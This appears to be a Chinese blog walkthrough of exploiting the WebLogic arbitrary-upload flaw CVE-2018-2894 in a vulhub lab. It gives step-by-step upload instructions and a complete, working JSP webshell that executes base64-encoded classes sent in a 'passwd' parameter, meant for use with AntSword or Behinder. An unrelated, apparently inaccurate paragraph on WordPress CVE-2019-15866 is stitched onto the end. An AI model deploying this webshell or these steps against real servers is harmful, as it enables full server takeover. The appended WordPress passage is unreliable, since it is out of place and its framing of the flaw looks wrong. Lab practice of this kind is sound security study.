任意文件上传漏洞(CVE-2018-2894)

漏洞描述

Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制,漏洞存在页面在/ws_utc/config.do。

漏洞影响版本

weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。

IP地址  http://192.168.xxx.xxx:7001/console    //进入后台系统

用户账号密码获取

vulhub靶场默认账户是weblogic   密码查看一下logs就能找到了

在kali上执行  docker-compose logs | grep password

环境准备

进入高级配置

 

在此处一定要进行勾选启用web服务器测试页,勾选后下拉的最下方进行保存配置

路径: http://192.168.17.130:7001/ws_utc/config.do

当前的工作目录路径,配置完成后进行保存

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

但在此处是有坑的如果这里的配置这里最后有css,那么上传文件后,你的访问链接应该是

路径:http://localhost:7001/ws_utc/css/config/keystore/1637485345393_shell.jsp

如果没有添加/css 那么上传文件后你的链接应该是

路径:http://localhost:7001/ws_utc/config/keystore/1637485345393_shell.jsp

   安全->添加->浏览

 上传成功之后,查看返回的数据包,其中有时间戳

可以通过查看源代码的方式或者使用Burp抓包进行获取

 获取权限

获取权限的路径   http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

我们可以使用蚁剑或者冰蝎进行连接来获取权限

http://192.168.17.130:7001/ws_utc/css/config/keystore/1666276503565_shell.jsp

shell.jsp 文件 (jsp一句话木马)

【连接密码】: passwd

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

WordPress是一种广泛使用的内容管理系统(CMS),用于创建和管理网站。然而,在2019年的漏洞披露中发现了一个名为CVE-2019-15866的重要漏洞,该漏洞使得攻击者可以进行任意文件上传。 该漏洞的利用方式是通过特制的恶意请求,将恶意文件上传到WordPress网站的服务器上。攻击者可以上传包含恶意代码的文件,例如Web外壳或后门程序,以获取对网站的完全控制权。一旦攻击者获得对网站的控制,他们可以执行后续的恶意活动,例如操纵网站内容、传播恶意软件或窃取敏感信息。 为了防止CVE-2019-15866漏洞的利用,用户应该尽快升级他们的WordPress网站到最新版本。WordPress开发团队通常会在发现漏洞时发布安全更新,其中包括修复漏洞和加强系统安全性的补丁。使用最新版本的WordPress是最有效的预防措施之一。 此外,用户还可以采取其他安全措施来保护他们的WordPress网站。以下是一些建议: 1. 安装并更新信任的安全插件: 安装安全插件,如Wordfence或iThemes Security,并确保将其保持最新。这些插件可以帮助检测和预防恶意文件上传等安全问题。 2. 设定强密码和安全验证: 使用强密码,包括字母、数字和特殊字符的组合,并启用二次验证功能(如果提供)以增加访问控制。 3. 限制文件上传:限制上传文件的类型和大小,仅允许所需的文件类型,并限制文件大小以防止攻击者上传恶意文件。 4. 定期备份网站文件和数据库:定期备份网站文件和数据库,以防止数据丢失,并确保在发生安全事件时能够进行恢复。 总结而言,CVE-2019-15866漏洞是一个严重的安全威胁,可以使攻击者上传任意文件到WordPress网站。用户应及时升级他们的WordPress版本,并采取额外的安全措施以保护他们的网站免受此漏洞的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

K.A.L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值